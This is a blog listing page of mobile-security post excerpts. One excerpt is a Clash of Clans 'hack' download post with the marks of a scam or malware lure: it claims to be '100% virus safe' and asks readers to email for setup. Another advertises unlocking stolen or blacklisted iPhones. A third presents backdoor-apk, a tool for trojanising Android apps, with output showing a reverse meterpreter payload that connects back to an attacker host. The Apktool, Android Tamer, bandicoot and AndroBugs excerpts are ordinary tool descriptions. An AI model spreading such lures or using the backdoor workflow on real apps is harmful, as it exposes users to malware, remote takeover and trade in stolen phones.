Posts

Showing posts with the label Mobile Security

{IOS+ANDRIOD} Clash of clans hack | PRIVATE SERVER | FREE! NO JAILBREAK! NO SURVAY

So many fake clash of clans hacks. A buddy of mine showed me this simple trick to get unlimited everything. The trick is called "God-Of-Gems". It's a very simple program. The program will get you a .ipa that you will later import into your device using "I-Funbox". WORKING AS OF 5/31/15 ENJOY! PLEASE EMAIL: botzone0@gmail.com for setup help! Tags: Gems hack Gold hack Elixir hack Anti-ban User-friendly design Android/iOs/Social platforms compatible Jail break require: NO Root require: NO 100% virus safe Automatic update check Many other resources IOS(IPHONE) link ANDRIOD LINK

How To Factory Unlock Your IPhone Rite from your Home

Image
Recently i came across a website where you can Factory unlock any iPhone permanently rite from you home .I Factory unlocked my iphone 5 locked To AT&T in just 6 hours . Why to unlock your iPhone what difference will it make ?  After unlocking you can use your iphone with any Gsm carrier in the world . Means you can shift  to any carrier that best suits  your needs . Unlike soft ware or hardware unlocks this  wont void your warranty  . Its safe and fast you just need to order the unlock , and restore your iphone from itunes  to get it unlocked as simple as that . You can increase the resale value of your iphone . you can even unlock black listed , stolen or insurance claimed phones  . they will work normally like a factory unlocked phone after unlocking   What models are supported ?  The big thing is you unlock almost all iPhone models from 40 countries and 500 different carriers around the world .  Breakthelock.com ...

Backdoor Android APK: backdoor-apk

Image
 backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only. Usage root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk [*] Generating reverse tcp meterpreter payload...done. [+] Handle the meterpreter connection at: 10.6.9.31:1337 [*] Decompiling original APK file...done. [*] Decompiling RAT APK file...done. [*] Creating new directories in original project for RAT smali files...done. [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Locating smali file to hook in original project...done. [*] Adding hook in original smali file...done. [*] Merging permissions of original and payload projects...done. [*] Recompiling or...

Reverse Engineering Android apk Files: Apktool

Image
Reverse Engineering Android apk Files ApkTool is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc. It is NOT intended for piracy and other non-legal uses. It could be used for localizing, adding some features or support for custom platforms and other GOOD purposes. Just try to be fair with authors of an app, that you use and probably like. Features Disassembling resources to nearly original form (including  resources.arsc ,  classes.dex ,  9.png.  and  XMLs ) Rebuilding decoded resources back to binary APK/JAR Organizing and handling APKs that depend on framework resources Smali Debugging (to be removed in  2.1.0  in favor of  IdeaSmali ) H...

Live Platform for Android Security Professionals: Android Tamer

Image
Live Platform for Android Security Professionals       AndroidTamer started out as a VirtualMachine for Android Security Professionals.  This Environment allows people to work on large array of android security related task’s ranging from Malware Analysis, Penetration Testing and Reverse Engineering. AndroidTamer is, at this point the only fully non-commercial non-sponsored entity in Android Security ecosystem. Android Tamer can work with as little as 512Mb RAM, however if you plan on keeping the eclipse environment running it is suggested to pack at east 1G – 1.5G ram.  Customized to the core, Debian 8 based virtual machine environment is preloaded with tools for Android Pentesting.  AndroidTamer Virtual Machine is a 5.1 GB OVA file ! A lot can be stored in 5GB and you can find all the tools stored inside /Arsenal Folder. Repos have been tested on Debian 8 and they should also work on Kali Linux and Ubuntu 14.04 or 16.04. Features VirtualBox Android Securi...

Analyze Mobile Phone Metadata: bandicoot

Image
Analyze Mobile Phone Metadata with  bandicoot      bandicoot  ( http://bandicoot.mit.edu  ) is Python toolbox to analyze mobile phone metadata. It provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results. It includes an interactive visualization, support for mobile phone recharges, support for Python 3, and clustering algorithms to handle both antenna and GPS locations. bandicoot provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results.  There are 1400+ behavioral indicators that are falling into three categories:  individual (e.g. number of calls, text response rate),  spatial  (e.g. radius of gyration, entropy of places)...

AndroBugs Framework

Image
AndroBugs Framework     AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate. Features: Find security vulnerabilities in an Android app Check if the code is missing best practices Check dangerous shell commands (e.g. “su”) Collect Information from millions of apps Check the app’s security protection (marked as  <Hacker> , designed for app repackaging hacking) Requirements Python 2.7.x (DO NOT USE Python 3.X) PyMongo library  (If you want to use the massive analysis tool) Setup Steps and Usage for Windows Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework mkdir C:\AndroBugs_Framework cd C:\AndroBugs_Framework U...